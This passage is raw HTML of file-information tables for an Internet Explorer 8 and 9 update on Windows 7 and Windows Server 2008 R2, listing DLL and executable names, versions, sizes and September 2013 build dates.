class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">11,020,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,231,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,233,408</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">48,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">981,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">68,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">48,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">982,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">68,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">860,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">860,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">163,328</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">163,328</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">200,704</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">200,704</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">525,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">525,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,078,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.18269</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,078,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.22464</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">760,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">760,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 9</h3><h4 class=\"sbody-h4\">Internet Explorer 9 on all supported x86-based versions of Windows 7 </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">65,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,129,472</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">75,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,130,496</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:20</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,012</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:07</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">12,336,128</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,012</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">12,336,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:26</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">20,842</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:07</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">09:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">20,842</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,800,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,806,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 9 on all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,346,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:36</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,346,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">763,544</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:48</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">763,544</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,494,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:33</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,494,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:11</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">85,504</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,392,128</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:33</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td 